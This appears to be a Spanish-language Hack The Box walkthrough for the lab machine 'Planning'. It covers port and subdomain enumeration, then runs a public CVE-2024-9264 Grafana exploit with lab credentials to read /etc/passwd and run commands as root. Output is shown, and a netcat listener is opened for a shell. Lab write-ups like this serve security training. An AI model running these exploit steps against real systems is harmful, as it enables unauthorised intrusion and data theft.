Q29weSBvZiBDb3B5IG9mIFBsYW5uaW5n

---

Reconnaissance

Para la fase de reconocimiento inicial de la máquina Planning utilizamos nuestra herramienta personalizada iRecon. Esta herramienta automatiza un escaneo Nmap completo que incluye:

1. Detección de puertos TCP abiertos (-p- --open).

2. Escaneo de versiones (-sV).

3. Ejecución de scripts NSE típicos para enumeración adicional (-sC).

4. Exportación del resultado en XML y conversión a HTML para facilitar su lectura.

Para empezar, exportaremos en una variable de entorno llamada IP la dirección IP de la máquina objetivo, lanzaremos la herramienta de iRecon proporcionándole la variable de entorno.

❯ export IP=10.10.11.68
❯ iRecon "$IP"

Resumen de Puertos Abiertos

En la enumeración de puertos encontramos importantes como los siguientes:

Puerto	Servicio
22	SSH
80	HTTP

Por el resultado obtenido a través del escaneo de puertos a través de Nmap, nos encontramos que dispone del puerto 22 (SSH) y una página web por el puerto 80 (HTTP) en la cual nos realiza una redirección a http://planning.htb. Además, por el resultado obtenido se puede comprobar que se trata de un sistema Linux.

En Hack The Box, en algunas máquinas se nos proporcionan credenciales de acceso que simulan pentest reales. En este caso, se nos proporcionan las siguientes credenciales que posteriormente verificaremos en dónde las podemos utilizar.

❯ echo '10.129.99.208 planning.htb' | sudo tee -a /etc/hosts
10.129.99.208 planning.htb

❯ whatweb -a 3 planning.htb
http://planning.htb [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[info@planning.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.129.99.208], JQuery[3.4.1], Script, Title[Edukate - Online Education Website], nginx[1.24.0]

First Tab

Second Tab

Untitled

Untitled

❯ feroxbuster -u 'http://planning.htb' -t 200 -s 200
                                                                                                                                                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://planning.htb
 🚀  Threads               │ 200
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      103l      772w    55609c http://planning.htb/img/about.jpg
200      GET       11l       56w     2406c http://planning.htb/lib/counterup/counterup.min.js
200      GET        6l       64w     2936c http://planning.htb/lib/owlcarousel/assets/owl.carousel.min.css
200      GET        1l       38w     2303c http://planning.htb/lib/easing/easing.min.js
200      GET       21l      212w    20494c http://planning.htb/img/team-3.jpg
200      GET      137l      234w     3338c http://planning.htb/js/main.js
200      GET        8l       58w     5269c http://planning.htb/img/testimonial-1.jpg
200      GET      201l      663w    10632c http://planning.htb/contact.php
200      GET        7l      158w     9028c http://planning.htb/lib/waypoints/waypoints.min.js
200      GET       63l      389w    30916c http://planning.htb/img/team-1.jpg
200      GET       60l      404w    29126c http://planning.htb/img/team-2.jpg
200      GET      128l      607w    48746c http://planning.htb/img/courses-2.jpg
200      GET      420l     1623w    23914c http://planning.htb/index.php
200      GET      146l      790w    75209c http://planning.htb/img/feature.jpg
200      GET        7l      279w    42766c http://planning.htb/lib/owlcarousel/owl.carousel.min.js
200      GET      136l      656w    53333c http://planning.htb/img/courses-3.jpg
200      GET      173l      851w    64663c http://planning.htb/img/courses-1.jpg
200      GET     9966l    19218w   183895c http://planning.htb/css/style.css
200      GET      194l      674w    10229c http://planning.htb/course.php
200      GET        5l       89w     5527c http://planning.htb/img/testimonial-2.jpg
200      GET      220l      880w    13006c http://planning.htb/detail.php
200      GET      230l      874w    12727c http://planning.htb/about.php
200      GET      420l     1623w    23914c http://planning.htb/
[####################] - 70s   150032/150032  0s      found:23      errors:0      
[####################] - 69s    30000/30000   438/s   http://planning.htb/ 
[####################] - 69s    30000/30000   437/s   http://planning.htb/css/ 
[####################] - 69s    30000/30000   436/s   http://planning.htb/js/ 
[####################] - 69s    30000/30000   436/s   http://planning.htb/lib/ 
[####################] - 69s    30000/30000   436/s   http://planning.htb/img/ 

❯ wfuzz --hh=178 --hc=400,404 -c -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -H "Host: FUZZ.planning.htb" http://planning.htb/ 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://planning.htb/
Total requests: 220545

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                             
=====================================================================


Total time: 294.3591
Processed Requests: 220545
Filtered Requests: 220545
Requests/sec.: 749.2378

❯ wfuzz --hh=178 --hc=400,404 -c -t 200 -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.planning.htb" http://planning.htb/ 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://planning.htb/
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                             
=====================================================================

000024093:   302        2 L      2 W        29 Ch       "grafana"                                                                                                                                                           

Total time: 144.4229
Processed Requests: 100000
Filtered Requests: 99999
Requests/sec.: 692.4105

❯ tail -n 1 /etc/hosts
10.129.99.208 planning.htb grafana.planning.htb

❯ whatweb -a 3 grafana.planning.htb
http://grafana.planning.htb [302 Found] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.129.99.208], RedirectLocation[/login], UncommonHeaders[x-content-type-options], X-Frame-Options[deny], X-XSS-Protection[1; mode=block], nginx[1.24.0]
http://grafana.planning.htb/login [200 OK] Country[RESERVED][ZZ], Grafana[11.0.0], HTML5, HTTPServer[Ubuntu Linux][nginx/1.24.0 (Ubuntu)], IP[10.129.99.208], Script[text/javascript], Title[Grafana], UncommonHeaders[x-content-type-options], X-Frame-Options[deny], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.24.0]

❯ git clone https://github.com/nollium/CVE-2024-9264; cd CVE-2024-9264
Cloning into 'CVE-2024-9264'...
remote: Enumerating objects: 67, done.
remote: Counting objects: 100% (67/67), done.
remote: Compressing objects: 100% (56/56), done.
remote: Total 67 (delta 38), reused 21 (delta 9), pack-reused 0 (from 0)
Receiving objects: 100% (67/67), 20.96 KiB | 3.49 MiB/s, done.
Resolving deltas: 100% (38/38), done.

❯ python3 -m venv .env
❯ source .env/bin/activate
❯ pip install -r requirements.txt

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r  -f /etc/passwd  http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Reading file: /etc/passwd
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/etc/passwd'):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
grafana:x:472:0::/home/grafana:/usr/sbin/nologin

❯ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r  -c 'id'  http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: id
[+] Successfully ran duckdb query:
[+] SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('id >/tmp/grafana_cmd_output 2>&1 |'):
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
uid=0(root) gid=0(root) groups=0(root)re

❯ nc -nlvp 443
listening on [any] 443 ...